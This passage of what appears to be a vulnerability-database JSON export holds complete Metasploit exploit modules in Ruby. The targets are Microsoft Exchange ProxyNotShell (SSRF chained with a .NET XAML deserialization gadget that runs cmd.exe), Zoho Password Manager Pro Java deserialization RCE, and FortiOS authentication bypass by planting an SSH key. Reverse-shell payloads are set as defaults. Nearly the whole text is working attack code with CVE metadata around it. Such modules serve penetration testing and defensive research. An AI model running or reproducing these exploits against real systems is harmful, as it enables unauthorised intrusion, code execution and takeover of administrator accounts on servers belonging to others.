username to authenticate as' ]), \nOptString.new('PASSWORD', [ true, 'The password to authenticate with' ]), \nOptString.new('DOMAIN', [ false, 'The domain to authenticate to' ]) \n]) \n \nregister_advanced_options([ \nOptEnum.new('EemsBypass', [ true, 'Technique to bypass the EEMS rule', 'IBM037v1', %w[IBM037v1 none]]) \n]) \nend \n \ndef check \n@ssrf_email ||= Faker::Internet.email \nres = send_http('GET', '/mapi/nspi/') \nreturn CheckCode::Unknown if res.nil? \nreturn CheckCode::Unknown('Server responded with 401 Unauthorized.') if res.code == 401 \nreturn CheckCode::Safe unless res.code == 200 && res.get_html_document.xpath('//head/title').text == 'Exchange MAPI/HTTP Connectivity Endpoint' \n \n# actually run the powershell cmdlet and see if it works, this will fail if: \n# * the credentials are incorrect (USERNAME, PASSWORD, DOMAIN) \n# * the exchange emergency mitigation service M1 rule is in place \nreturn CheckCode::Safe unless execute_powershell('Get-Mailbox') \n \nCheckCode::Vulnerable \nrescue Msf::Exploit::Failed => e \nCheckCode::Safe(e.to_s) \nend \n \ndef ibm037(string) \nstring.encode('IBM037').force_encoding('ASCII-8BIT') \nend \n \ndef send_http(method, uri, opts = {}) \nopts[:authentication] = { \n'username' => datastore['USERNAME'], \n'password' => datastore['PASSWORD'], \n'preferred_auth' => 'NTLM' \n} \n \nif uri =~ /powershell/i && datastore['EemsBypass'] == 'IBM037v1' \nuri = \"/Autodiscover/autodiscover.json?#{ibm037(@ssrf_email + uri + '?')}&#{ibm037('Email')}=#{ibm037('Autodiscover/autodiscover.json?' + @ssrf_email)}\" \nopts[:headers] = { \n'X-Up-Devcap-Post-Charset' => 'IBM037', \n# technique needs the \"UP\" prefix, see: https://github.com/Microsoft/referencesource/blob/3b1eaf5203992df69de44c783a3eda37d3d4cd10/System/net/System/Net/HttpListenerRequest.cs#L362 \n'User-Agent' => \"UP #{datastore['UserAgent']}\" \n} \nelse \nuri = \"/Autodiscover/autodiscover.json?#{@ssrf_email + uri}?&Email=Autodiscover/autodiscover.json?#{@ssrf_email}\" \nend \n \nsuper(method, uri, opts) \nend \n \ndef exploit \n# if we're doing pre-exploit checks, make sure the target is Exchange Server 2019 because the XamlGadget does not \n# work on Exchange Server 2016 \nif datastore['AutoCheck'] && !datastore['ForceExploit'] && (version = exchange_get_version) \nvprint_status(\"Detected Exchange version: #{version}\") \nif version < Rex::Version.new('15.2') \nfail_with(Failure::NoTarget, 'This exploit is only compatible with Exchange Server 2019 (version 15.2)') \nend \nend \n \n@ssrf_email ||= Faker::Internet.email \n \ncase target['Type'] \nwhen :windows_command \nvprint_status(\"Generated payload: #{payload.encoded}\") \nexecute_command(payload.encoded) \nwhen :windows_dropper \nexecute_cmdstager({ linemax: 7_500 }) \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nxaml = Nokogiri::XML(<<-XAML, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root \n<ResourceDictionary \nxmlns=\"http://schemas.microsoft.com/winfx/2006/xaml/presentation\" \nxmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" \nxmlns:System=\"clr-namespace:System;assembly=mscorlib\" \nxmlns:Diag=\"clr-namespace:System.Diagnostics;assembly=system\"> \n<ObjectDataProvider x:Key=\"LaunchCalch\" ObjectType=\"{x:Type Diag:Process}\" MethodName=\"Start\"> \n<ObjectDataProvider.MethodParameters> \n<System:String>cmd.exe</System:String> \n<System:String>/c #{cmd.encode(xml: :text)}</System:String> \n</ObjectDataProvider.MethodParameters> \n</ObjectDataProvider> \n</ResourceDictionary> \nXAML \n \nidentity = Nokogiri::XML(<<-IDENTITY, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root \n<Obj N=\"V\" RefId=\"14\"> \n<TN RefId=\"1\"> \n<T>System.ServiceProcess.ServiceController</T> \n<T>System.Object</T> \n</TN> \n<ToString>Object</ToString> \n<Props> \n<S N=\"Name\">Type</S> \n<Obj N=\"TargetTypeForDeserialization\"> \n<TN RefId=\"1\"> \n<T>System.Exception</T> \n<T>System.Object</T> \n</TN> \n<MS> \n<BA N=\"SerializationData\"> \n#{Rex::Text.encode_base64(XamlLoaderGadget.generate.to_binary_s)} \n</BA> \n</MS> \n</Obj> \n</Props> \n<S> \n<![CDATA[#{xaml}]]> \n</S> \n</Obj> \nIDENTITY \n \nexecute_powershell('Get-Mailbox', args: [ \n{ name: '-Identity', value: identity } \n]) \nend \nend \n \nclass XamlLoaderGadget < Msf::Util::DotNetDeserialization::Types::SerializedStream \ninclude Msf::Util::DotNetDeserialization \n \ndef self.generate \nfrom_values([ \nTypes::RecordValues::SerializationHeaderRecord.new(root_id: 1, header_id: -1), \nTypes::RecordValues::SystemClassWithMembersAndTypes.from_member_values( \nclass_info: Types::General::ClassInfo.new( \nobj_id: 1, \nname: 'System.UnitySerializationHolder', \nmember_names: %w[Data UnityType AssemblyName] \n), \nmember_type_info: Types::General::MemberTypeInfo.new( \nbinary_type_enums: %i[String Primitive String], \nadditional_infos: [ 8 ] \n), \nmember_values: [ \nTypes::Record.from_value(Types::RecordValues::BinaryObjectString.new( \nobj_id: 2, \nstring: 'System.Windows.Markup.XamlReader' \n)), \n4, \nTypes::Record.from_value(Types::RecordValues::BinaryObjectString.new( \nobj_id: 3, \nstring: 'PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35' \n)) \n] \n), \nTypes::RecordValues::MessageEnd.new \n]) \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/170066/exchange_proxynotshell_rce.rb.txt"}, {"lastseen": "2022-08-03T16:24:48", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-03T00:00:00", "type": "packetstorm", "title": "Zoho Password Manager Pro XML-RPC Java Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-35405"], "modified": "2022-08-03T00:00:00", "id": "PACKETSTORM:167918", "href": "https://packetstormsecurity.com/files/167918/Zoho-Password-Manager-Pro-XML-RPC-Java-Deserialization.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::JavaDeserialization \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Zoho Password Manager Pro XML-RPC Java Deserialization', \n'Description' => %q{ \nThis module exploits a Java deserialization vulnerability in Zoho ManageEngine Pro \nbefore 12101 and PAM360 before 5510. Unauthenticated attackers can send a \ncrafted XML-RPC request containing malicious serialized data to /xmlrpc to \ngain RCE as the SYSTEM user. \n}, \n'Author' => [ \n'Vinicius', # Discovery \n'Y4er', # Writeup \n'Grant Willcox' # Exploit \n], \n'References' => [ \n['CVE', '2022-35405'], \n['URL', 'https://xz.aliyun.com/t/11578'], # Writeup \n['URL', 'https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html'], # Advisory \n['URL', 'https://archives2.manageengine.com/passwordmanagerpro/12101/ManageEngine_PasswordManager_Pro_12100_to_12101.ppm'] # The patch. \n], \n'DisclosureDate' => '2022-06-24', # Vendor release date of patch and new installer, as advisory lacks any date. \n'License' => MSF_LICENSE, \n'Platform' => ['win'], \n'Arch' => [ARCH_CMD, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Windows EXE Dropper', \n{ \n'Arch' => ARCH_X64, \n'Type' => :windows_dropper, \n'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' } \n} \n], \n[ \n'Windows Command', \n{ \n'Arch' => ARCH_CMD, \n'Type' => :windows_command, \n'Space' => 3000, \n'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/reverse_powershell' } \n} \n], \n[ \n'Windows Powershell', \n{ \n'Arch' => ARCH_X64, \n'Type' => :windows_powershell, \n'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell/x64/meterpreter/reverse_tcp' } \n} \n] \n], \n'DefaultTarget' => 1, \n'DefaultOptions' => { \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOpt::RPORT(7272), \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \n# Send an empty serialized object \nres = send_request_xmlrpc('') \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check.') \nend \n \nif res.body.include?('Failed to read result object: null') \nreturn CheckCode::Vulnerable('Target can deserialize arbitrary data.') \nend \n \nCheckCode::Safe('Target cannot deserialize arbitrary data.') \nend \n \ndef exploit \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \ncase target['Type'] \nwhen :windows_command \nexecute_command(payload.encoded) \nwhen :windows_dropper \ncmd_target = targets.select { |target| target['Type'] == :windows_command }.first \nexecute_cmdstager({ linemax: cmd_target.opts['Space'] }) \nwhen :windows_powershell \nexecute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true)) \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nvprint_status(\"Executing command: #{cmd}\") \n \nres = send_request_xmlrpc( \ngenerate_java_deserialization_for_command('CommonsBeanutils1', 'cmd', cmd) \n) \n \nunless res && res.code == 200 \nfail_with(Failure::UnexpectedReply, \"Failed to execute command: #{cmd}\") \nend \n \nprint_good(\"Successfully executed command: #{cmd}\") \nend \n \ndef send_request_xmlrpc(data) \n# http://xmlrpc.com/ \n# https://ws.apache.org/xmlrpc/ \nsend_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/xmlrpc'), \n'ctype' => 'text/xml', \n'data' => <<~XML \n<?xml version=\"1.0\"?> \n<methodCall> \n<methodName>#{rand_text_alphanumeric(8..42)}</methodName> \n<params> \n<param> \n<value> \n<struct> \n<member> \n<name>#{rand_text_alphanumeric(8..42)}</name> \n<value> \n<serializable xmlns=\"http://ws.apache.org/xmlrpc/namespaces/extensions\">#{Rex::Text.encode_base64(data)}</serializable> \n</value> \n</member> \n</struct> \n</value> \n</param> \n</params> \n</methodCall> \nXML \n) \nend \n \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/167918/zoho_password_manager_pro_xml_rpc_rce.rb.txt"}, {"lastseen": "2022-10-19T17:39:19", "description": "", "cvss3": {}, "published": "2022-10-19T00:00:00", "type": "packetstorm", "title": "Fortinet FortiOS / FortiProxy / FortiSwitchManager Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-40684"], "modified": "2022-10-19T00:00:00", "id": "PACKETSTORM:169431", "href": "https://packetstormsecurity.com/files/169431/Fortinet-FortiOS-FortiProxy-FortiSwitchManager-Authentication-Bypass.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::SSH \nprepend Msf::Exploit::Remote::AutoCheck \n \nattr_accessor :ssh_socket \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Fortinet FortiOS, FortiProxy, and FortiSwitchManager authentication bypass.', \n'Description' => %q{ \nThis module exploits an authentication bypass vulnerability \nin the Fortinet FortiOS, FortiProxy, and FortiSwitchManager API \nto gain access to a chosen account. And then add a SSH key to the \nauthorized_keys file of the chosen account, allowing \nto login to the system with the chosen account. \n \nSuccessful exploitation results in remote code execution. \n}, \n'Author' => [ \n'Heyder Andrade <@HeyderAndrade>', # Metasploit module \n'Zach Hanley <@hacks_zach>', # PoC \n], \n'References' => [ \n['CVE', '2022-40684'], \n['URL', 'https://www.fortiguard.com/psirt/FG-IR-22-377'], \n['URL', 'https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684'], \n], \n'License' => MSF_LICENSE, \n'DisclosureDate' => '2022-10-10', # Vendor advisory \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD], \n'Privileged' => true, \n'Targets' => [ \n[ \n'FortiOS', \n{ \n'DefaultOptions' => { \n'PAYLOAD' => 'generic/ssh/interact' \n}, \n'Payload' => { \n'Compat' => { \n'PayloadType' => 'ssh_interact' \n} \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [ \nIOC_IN_LOGS, \nARTIFACTS_ON_DISK # SSH key is added to authorized_keys file \n] \n} \n) \n) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'The base path to the Fortinet CMDB API', '/api/v2/cmdb/']), \nOptString.new('USERNAME', [false, 'Target username (Default: auto-detect)', nil]), \nOptString.new('PRIVATE_KEY', [false, 'SSH private key file path', nil]), \nOptString.new('KEY_PASS', [false, 'SSH private key password', nil]), \nOptString.new('SSH_RPORT', [true, 'SSH port to connect to', 22]), \nOptBool.new('PREFER_ADMIN', [false, 'Prefer to use the admin user if one is detected', true]) \n] \n) \nend \n \ndef username \nif datastore['USERNAME'] \n@username ||= datastore['USERNAME'] \nelse \n@username ||= detect_username \nend \nend \n \ndef ssh_rport \ndatastore['SSH_RPORT'] \nend \n \ndef current_keys \n@current_keys ||= read_keys \nend \n \ndef ssh_keygen \n# ssh-keygen -t rsa -m PEM -f `openssl rand -hex 8` \nif datastore['PRIVATE_KEY'] \n@ssh_keygen ||= Net::SSH::KeyFactory.load_data_private_key( \nFile.read(datastore['PRIVATE_KEY']), \ndatastore['KEY_PASS'], \ndatastore['PRIVATE_KEY'] \n) \nelse \n@ssh_keygen ||= OpenSSL::PKey::EC.generate('prime256v1') \nend \nend \n \ndef ssh_private_key \nssh_keygen.to_pem \nend \n \ndef ssh_pubkey \nRex::Text.encode_base64(ssh_keygen.public_key.to_blob) \nend \n \ndef authorized_keys \npubkey = Rex::Text.encode_base64(ssh_keygen.public_key.to_blob) \n\"#{ssh_keygen.ssh_type} #{pubkey} #{username}@localhost\" \nend \n \ndef fortinet_request(params = {}) \nsend_request_cgi( \n{ \n'ctype' => 'application/json', \n'agent' => 'Report Runner', \n'headers' => { \n'Forwarded' => \"for=\\\"[127.0.0.1]:#{rand(1024..65535)}\\\";by=\\\"[127.0.0.1]:#{rand(1024..65535)}\\\"\" \n} \n}.merge(params) \n) \nend \n \ndef check \nvprint_status(\"Checking #{datastore['RHOST']}:#{datastore['RPORT']}\") \n# a normal request to the API should return a 401 \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, Rex::Text.rand_text_alpha_lower(6)), \n'ctype' => 'application/json' \n}) \n \nreturn CheckCode::Unknown('Target did not respond to check.') unless res \nreturn CheckCode::Safe('Target seems not affected by this vulnerability.') unless res.code == 401 \n \n# Trying to bypasss the authentication and get the sshkey from the current targeted user it should return a 200 if vulnerable \nres = fortinet_request({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/system/status') \n}) \n \nreturn CheckCode::Safe unless res&.code == 200 \n \nversion = res.get_json_document['version'] \n \nprint_good(\"Target is running the version #{version}, which is vulnerable.\") \n \nSocket.tcp(rhost, ssh_rport, connect_timeout: datastore['SSH_TIMEOUT']) { |sock| return CheckCode::Safe('However SSH is not open, so adding a ssh key wouldn\\t give you access to the host.') unless sock } \n \nCheckCode::Vulnerable('And SSH is running which makes it exploitable.') \nend \n \ndef cleanup \nreturn unless ssh_socket \n \n# it assumes our key is the last one and set it to a random text. The API didn't respond to DELETE method \ndata = { \n\"ssh-public-key#{current_keys.empty? ? '1' : current_keys.size}\" => '\"\"' \n} \n \nfortinet_request({ \n'method' => 'PUT', \n'uri' => normalize_uri(target_uri.path, '/system/admin/', username), \n'data' => data.to_json \n}) \nend \n \ndef detect_username \nvprint_status('User auto-detection...') \nres = fortinet_request( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/system/admin') \n) \nusers = res.get_json_document['results'].collect { |e| e['name'] if (e['accprofile'] == 'super_admin' && e['trusthost1'] == '0.0.0.0 0.0.0.0') }.compact \n# we prefer to use admin, but if it doesn't exist we chose a random one. \nif datastore['PREFER_ADMIN'] \nvprint_status(\"PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, but if it isn't found we will pick a random one.\") \nusers.include?('admin') ? 'admin' : users.sample \nelse \nvprint_status(\"PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, we will get a random that is not the admin.\") \n(users - ['admin']).sample \nend \nend \n \ndef add_ssh_key \nif current_keys.include?(authorized_keys) \n# then we'll remove that on cleanup \nprint_good('Your key is already in the authorized_keys file') \nreturn \nend \nvprint_status('Adding SSH key to authorized_keys file') \n# Adding the SSH key as the last entry in the authorized_keys file \nkeystoadd = current_keys.first(2) + [authorized_keys] \ndata = keystoadd.map.with_index { |key, idx| [\"ssh-public-key#{idx + 1}\", \"\\\"#{key}\\\"\"] }.to_h \n \nres = fortinet_request({ \n'method' => 'PUT', \n'uri' => normalize_uri(target_uri.path, '/system/admin/', username), \n'data' => data.to_json \n}) \nfail_with(Failure::UnexpectedReply, 'Failed to add SSH key to authorized_keys file.') unless res&.code == 500 \nbody = res.get_json_document \nfail_with(Failure::UnexpectedReply, 'Unexpected reponse from the server after adding the key.') unless body.key?('cli_error') && body['cli_error'] =~ /SSH key is good/ \nend \n \ndef read_keys \nvprint_status('Reading SSH key from authorized_keys file') \nres = fortinet_request({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/system/admin/', username) \n}) \nfail_with(Failure::UnexpectedReply, 'Failed read current SSH keys') unless res&.code == 200 \nresult = res.get_json_document['results'].first \n['ssh-public-key1', 'ssh-public-key2', 'ssh-public-key3'].map do |key| \nresult[key].gsub('\"', '') unless result[key].empty? \nend.compact \nend \n \ndef do_login(ssh_options) \n# ensure we don't have a stale socket hanging around \nssh_options[:proxy].proxies = nil if ssh_options[:proxy] \nbegin \n::Timeout.timeout(datastore['SSH_TIMEOUT']) do \nself.ssh_socket = Net::SSH.start(rhost, username, ssh_options) \nend \nrescue Rex::ConnectionError \nfail_with(Failure::Unreachable, 'Disconnected during negotiation') \nrescue Net::SSH::Disconnect, ::EOFError \nfail_with(Failure::Disconnected, 'Timed out during negotiation') \nrescue Net::SSH::AuthenticationFailed \nfail_with(Failure::NoAccess, 'Failed authentication') \nrescue Net::SSH::Exception => e \nfail_with(Failure::Unknown, \"SSH Error: #{e.class} : #{e.message}\") \nend \n \nfail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket \nend \n \ndef exploit \nprint_status(\"Executing exploit on #{datastore['RHOST']}:#{datastore['RPORT']} target user: #{username}\") \nadd_ssh_key \nvprint_status('Establishing SSH connection') \nssh_options = ssh_client_defaults.merge({ \nauth_methods: ['publickey'], \nkey_data: [ ssh_private_key ], \nport: ssh_rport \n}) \nssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG'] \n \ndo_login(ssh_options) \n \nhandler(ssh_socket) \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/169431/fortinet_authentication_bypass_cve_2022_40684.rb.txt"}], "metasploit": [{"lastseen": "2022-11-30T20:50:17", "description": "This module chains two vulnerabilities on Microsoft Exchange Server that, when combined, allow an authenticated attacker to interact with the Exchange Powershell backend (CVE-2022-41040), where a deserialization flaw can be leveraged to obtain code execution (CVE-2022-41082). This exploit only support Exchange Server 2019. These vulnerabilities were patched in November 2022.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-18T22:00:27", "type": "metasploit", "title": "Microsoft Exchange ProxyNotShell RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-11-28T15:06:14", "id": "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYNOTSHELL_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxynotshell_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Remote::HTTP::Exchange\n include Msf::Exploit::Remote::HTTP::Exchange::ProxyMaybeShell\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Exchange ProxyNotShell RCE',\n 'Description' => %q{\n This module chains two vulnerabilities on Microsoft Exchange Server\n that, when combined, allow an authenticated attacker to interact with\n the Exchange Powershell backend (CVE-2022-41040), where a\n deserialization flaw can be leveraged to obtain code execution\n (CVE-2022-41082). This exploit only support Exchange Server 2019.\n\n These vulnerabilities were patched in November 2022.\n },\n 'Author' => [\n 'Orange Tsai', # Discovery of ProxyShell SSRF\n 'Spencer McIntyre', # Metasploit module\n 'DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q', # Vulnerability analysis\n 'Piotr Bazyd\u0142o', # Vulnerability analysis\n 'Rich Warren', # EEMS bypass via ProxyNotRelay\n 'Soroush Dalili' # EEMS bypass\n ],\n 'References' => [\n [ 'CVE', '2022-41040' ], # ssrf\n [ 'CVE', '2022-41082' ], # rce\n [ 'URL', 'https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend' ],\n [ 'URL', 'https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/' ],\n [ 'URL', 'https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9' ],\n [ 'URL', 'https://rw.md/2022/11/09/ProxyNotRelay.html' ]\n ],\n 'DisclosureDate' => '2022-09-28', # announcement of limited details, patched 2022-11-08\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Platform' => ['windows'],\n 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Windows Dropper',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :windows_dropper\n }\n ],\n [\n 'Windows Command',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_CMD],\n 'Type' => :windows_command\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\n 'AKA' => ['ProxyNotShell'],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n )\n )\n\n register_options([\n OptString.new('USERNAME', [ true, 'A specific username to authenticate as' ]),\n OptString.new('PASSWORD', [ true, 'The password to authenticate with' ]),\n OptString.new('DOMAIN', [ false, 'The domain to authenticate to' ])\n ])\n\n register_advanced_options([\n OptEnum.new('EemsBypass', [ true, 'Technique to bypass the EEMS rule', 'IBM037v1', %w[IBM037v1 none]])\n ])\n end\n\n def check\n @ssrf_email ||= Faker::Internet.email\n res = send_http('GET', '/mapi/nspi/')\n return CheckCode::Unknown if res.nil?\n return CheckCode::Unknown('Server responded with 401 Unauthorized.') if res.code == 401\n return CheckCode::Safe unless res.code == 200 && res.get_html_document.xpath('//head/title').text == 'Exchange MAPI/HTTP Connectivity Endpoint'\n\n # actually run the powershell cmdlet and see if it works, this will fail if:\n # * the credentials are incorrect (USERNAME, PASSWORD, DOMAIN)\n # * the exchange emergency mitigation service M1 rule is in place\n return CheckCode::Safe unless execute_powershell('Get-Mailbox')\n\n CheckCode::Vulnerable\n rescue Msf::Exploit::Failed => e\n CheckCode::Safe(e.to_s)\n end\n\n def ibm037(string)\n string.encode('IBM037').force_encoding('ASCII-8BIT')\n end\n\n def send_http(method, uri, opts = {})\n opts[:authentication] = {\n 'username' => datastore['USERNAME'],\n 'password' => datastore['PASSWORD'],\n 'preferred_auth' => 'NTLM'\n }\n\n if uri =~ /powershell/i && datastore['EemsBypass'] == 'IBM037v1'\n uri = \"/Autodiscover/autodiscover.json?#{ibm037(@ssrf_email + uri + '?')}&#{ibm037('Email')}=#{ibm037('Autodiscover/autodiscover.json?' + @ssrf_email)}\"\n opts[:headers] = {\n 'X-Up-Devcap-Post-Charset' => 'IBM037',\n # technique needs the \"UP\" prefix, see: https://github.com/Microsoft/referencesource/blob/3b1eaf5203992df69de44c783a3eda37d3d4cd10/System/net/System/Net/HttpListenerRequest.cs#L362\n 'User-Agent' => \"UP #{datastore['UserAgent']}\"\n }\n else\n uri = \"/Autodiscover/autodiscover.json?#{@ssrf_email + uri}?&Email=Autodiscover/autodiscover.json?#{@ssrf_email}\"\n end\n\n super(method, uri, opts)\n end\n\n def exploit\n # if we're doing pre-exploit checks, make sure the target is Exchange Server 2019 because the XamlGadget does not\n # work on Exchange Server 2016\n if datastore['AutoCheck'] && !datastore['ForceExploit'] && (version = exchange_get_version)\n vprint_status(\"Detected Exchange version: #{version}\")\n if version < Rex::Version.new('15.2')\n fail_with(Failure::NoTarget, 'This exploit is only compatible with Exchange Server 2019 (version 15.2)')\n end\n end\n\n @ssrf_email ||= Faker::Internet.email\n\n case target['Type']\n when :windows_command\n vprint_status(\"Generated payload: #{payload.encoded}\")\n execute_command(payload.encoded)\n when :windows_dropper\n execute_cmdstager({ linemax: 7_500 })\n end\n end\n\n def execute_command(cmd, _opts = {})\n xaml = Nokogiri::XML(<<-XAML, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root\n <ResourceDictionary\n xmlns=\"http://schemas.microsoft.com/winfx/2006/xaml/presentation\"\n xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\"\n xmlns:System=\"clr-namespace:System;assembly=mscorlib\"\n xmlns:Diag=\"clr-namespace:System.Diagnostics;assembly=system\">\n <ObjectDataProvider x:Key=\"LaunchCalch\" ObjectType=\"{x:Type Diag:Process}\" MethodName=\"Start\">\n <ObjectDataProvider.MethodParameters>\n <System:String>cmd.exe</System:String>\n <System:String>/c #{cmd.encode(xml: :text)}</System:String>\n </ObjectDataProvider.MethodParameters>\n </ObjectDataProvider>\n </ResourceDictionary>\n XAML\n\n identity = Nokogiri::XML(<<-IDENTITY, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root\n <Obj N=\"V\" RefId=\"14\">\n <TN RefId=\"1\">\n <T>System.ServiceProcess.ServiceController</T>\n <T>System.Object</T>\n </TN>\n <ToString>Object</ToString>\n <Props>\n <S N=\"Name\">Type</S>\n <Obj N=\"TargetTypeForDeserialization\">\n <TN RefId=\"1\">\n <T>System.Exception</T>\n <T>System.Object</T>\n </TN>\n <MS>\n <BA N=\"SerializationData\">\n #{Rex::Text.encode_base64(XamlLoaderGadget.generate.to_binary_s)}\n </BA>\n </MS>\n </Obj>\n </Props>\n <S>\n <![CDATA[#{xaml}]]>\n </S>\n </Obj>\n IDENTITY\n\n execute_powershell('Get-Mailbox', args: [\n { name: '-Identity', value: identity }\n ])\n end\nend\n\nclass XamlLoaderGadget < Msf::Util::DotNetDeserialization::Types::SerializedStream\n include Msf::Util::DotNetDeserialization\n\n def self.generate\n from_values([\n Types::RecordValues::SerializationHeaderRecord.new(root_id: 1, header_id: -1),\n Types::RecordValues::SystemClassWithMembersAndTypes.from_member_values(\n class_info: Types::General::ClassInfo.new(\n obj_id: 1,\n name: 'System.UnitySerializationHolder',\n member_names: %w[Data UnityType AssemblyName]\n ),\n member_type_info: Types::General::MemberTypeInfo.new(\n binary_type_enums: %i[String Primitive String],\n additional_infos: [ 8 ]\n ),\n member_values: [\n Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(\n obj_id: 2,\n string: 'System.Windows.Markup.XamlReader'\n )),\n 4,\n Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(\n obj_id: 3,\n string: 'PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35'\n ))\n ]\n ),\n Types::RecordValues::MessageEnd.new\n ])\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/exchange_proxynotshell_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-29T19:46:10", "description": "This module exploits a Java deserialization 